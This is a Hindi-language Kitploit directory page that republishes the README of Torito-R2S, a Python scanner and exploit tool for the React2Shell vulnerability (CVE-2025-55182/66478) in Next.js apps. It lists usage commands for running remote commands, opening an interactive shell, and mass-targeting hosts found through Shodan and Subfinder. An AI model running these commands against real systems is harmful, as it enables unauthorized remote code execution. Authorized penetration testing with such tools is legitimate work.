Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Torito-R2S — Torito React2Shell स्कैनर और एक्सप्लॉइट टूल (CVE-2025-55182 / 66478) | Kitploit
उपकरण/GitHubGitHub/toritoio/torito-r2s
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलसबडोमेन एनुमरेशन
GitHubtoritoio/torito-r2s

Torito-R2S

Torito React2Shell स्कैनर और एक्सप्लॉइट टूल (CVE-2025-55182 / 66478)

रिपॉजिटरी देखें
418 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Torito React2Shell स्कैनर और शोषण उपकरण (CVE-2025-55182 / 66478)

Torito लोगो

Next.js RSC लक्ष्यों के लिए डिटेक्शन-प्रथम स्कैनर, वैकल्पिक PoC पुष्टि और शोषण/शैल मोड के साथ। केवल उन प्रणालियों पर उपयोग करें जिनका परीक्षण करने के लिए आप अधिकृत हैं।

आवश्यकताएँ

  • Python 3.9+
  • pip install -r requirements.txt
  • Subfinder बाइनरी PATH में होनी चाहिए --subfinder के लिए (Homebrew brew install subfinder या Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest के माध्यम से स्थापित करें; प्रोजेक्ट: https://github.com/projectdiscovery/subfinder)
  • Shodan उपयोग के लिए pip install shodan आवश्यक है (पहले से आवश्यकताओं में है) और एक कुंजी: export SHODAN_API_KEY=... उपलब्ध क्वेरी क्रेडिट के साथ

उपयोग

root@kitploit:~
python3 torito_r2s.py --help

फ़्लैग्स

उदाहरण

सुरक्षित जांच (एकल लक्ष्य)

root@kitploit:~
python3 torito_r2s.py -u https://target.com

PoC पुष्टि (साइड-चैनल रीडायरेक्ट)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --confirm

कस्टम कमांड के साथ शोषण

root@kitploit:~
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"

पहली हिट पर इंटरैक्टिव शैल

root@kitploit:~
python3 torito_r2s.py -u https://target.com --shell

निर्यात के साथ सूची स्कैन

root@kitploit:~
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv

केवल Shodan (कुंजी और क्रेडिट आवश्यक)

root@kitploit:~
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm

केवल Subfinder

root@kitploit:~
python3 torito_r2s.py --subfinder target.com --confirm

प्रॉक्सी (Burp/Caido)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm

stdin के माध्यम से पाइपलाइन

root@kitploit:~
cat urls.txt | python3 torito_r2s.py --confirm

आउटपुट नोट्स

  • तालिका फिंगरप्रिंट (NX/AR), जांच, पुष्टि, शोषण दिखाती है।
  • शोषण डाइजेस्ट संभव होने पर base64-डीकोड किए जाते हैं; वर्बोज़ मोड पूर्वावलोकन दिखाता है।
  • JSON/CSV में रॉ डाइजेस्ट और डीकोड किया गया आउटपुट (यदि कोई हो) शामिल है।

सुरक्षा

  • केवल अधिकृत परीक्षण के लिए।
  • डिफ़ॉल्ट रन गैर-विनाशकारी जांच है; शोषण केवल --exploit-cmd या --shell के साथ निष्पादित होता है।
टूल डाउनलोड करें
फ़्लैगविवरणडिफ़ॉल्ट
-u, --url URLएकल लक्ष्य URL—
-l, --list FILEलक्ष्यों वाली फ़ाइल (एक प्रति पंक्ति)—
--subfinder DOMAINडोमेन के लिए subfinder चलाएं और परिणाम जोड़ें—
--shodan QUERYShodan खोज (SHODAN_API_KEY क्रेडिट सहित आवश्यक है)—
--shodan-limit Nप्रति क्वेरी अधिकतम Shodan परिणाम100
-t, --threads Nसमवर्तीता20
--timeout SECअनुरोध टाइमआउट10
--proxy URLHTTP/HTTPS प्रॉक्सी—
--confirmजांच के बाद रीडायरेक्ट-आधारित PoC चलाएंoff
--exploit-cmd "CMD"कमांड के साथ RCE पेलोड चलाएं—
--shell, -iपहली शोषण सफलता पर इंटरैक्टिव शैल खोलें (डिफ़ॉल्ट cmd id होता है)off
--json-out FILEJSON परिणाम सहेजें—
--csv-out FILECSV परिणाम सहेजें—
-v, --verboseटेबल में डीकोड किए गए आउटपुट/डाइजेस्ट दिखाएंoff